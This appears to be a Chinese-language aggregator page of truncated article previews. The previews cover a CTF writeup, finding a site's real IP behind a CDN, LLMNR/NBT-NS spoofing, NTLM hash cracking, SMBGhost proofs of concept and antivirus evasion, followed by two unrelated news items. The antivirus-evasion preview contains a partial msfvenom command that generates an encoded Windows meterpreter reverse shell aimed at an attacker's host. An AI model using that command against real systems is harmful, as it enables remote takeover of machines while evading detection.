2020首届太湖杯|writeup

Web 0x01 checkingame 0x02 easyweb0x03 crossfire0x04 ezmd5 0x01 checkingame 浏览器从Sources看下js, config.js和game.js弹出flag 的函数被加密,但限制时间的重载页面可以利用burp...

绕过CDN查询真实IP方法(总结)

近期朋友问我帮忙查询一主站的真实ip地址,那我顺便来总结一下如何绕过CDN来找到目标站点的真实ip 先来个小科普: 什么是CDN加速? CDN的全称是 Content Delivery Network,即内容分发网络,这...

LLMNR/NBT-NS欺骗攻击

简介  LLMNR&NBT-NS 欺骗攻击是一种经典的内部网络攻击,然而由于一方面了解它的人很少,另一方面在Windows中它们是默认启用的,所以该攻击到现在仍然是有效的。在本文中,我们首先为读者解释什么...

LM NTML NET-NTLM2理解及hash破解

LM  Windows Vista / Server 2008已经默认关闭,在老版本可以遇到,但根据windwos的向下兼容性,可以通过组策略启用它(https://support.microsoft.com/en-us/help/299656/how-to-prevent-windows-from-...

(CVE-2020-0796)漏洞POC汇总

0x00 概述 20200310,microsoft透露了一个smb v3协议漏洞。20200312,microsoft出补丁。漏洞命名:smbghost/deepblue......Microsoft Server Message Block 3.1.1(SMBv3)协议处理某些请求的方式中存在远程...

免杀msfvenom和msf5

msfvenom各平台生成木马大全: windows:msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b 'x00x0axff' -i 3 -f exe -opayl...

积木“魔法师”21万颗粒“铸”兰州黄河铁桥 再现丝路盛景

 中新网兰州3月22日电 (记者 崔琳 杨艳敏)21日晚,“90后”积木“魔法师”蒋晟晖耗时800个小时,运用165000块乐高颗粒树立的嘉峪关3D模型与耗时1000小时运用210000块乐高颗粒“铸就”的兰州黄河铁桥马赛克画露脸兰...

百亿投资入“麒麟” 自主操作系统发展或迎大机遇

操作体系被认为是计算机的大脑。跟着信息技术的高速展开,操作体系的重要性和地位日益凸显。但令人遗憾的是,我国操作体系企业遍及出现小、散、弱局势,配套软硬件生态松散,无法构成合力,业界急需打造具有统一...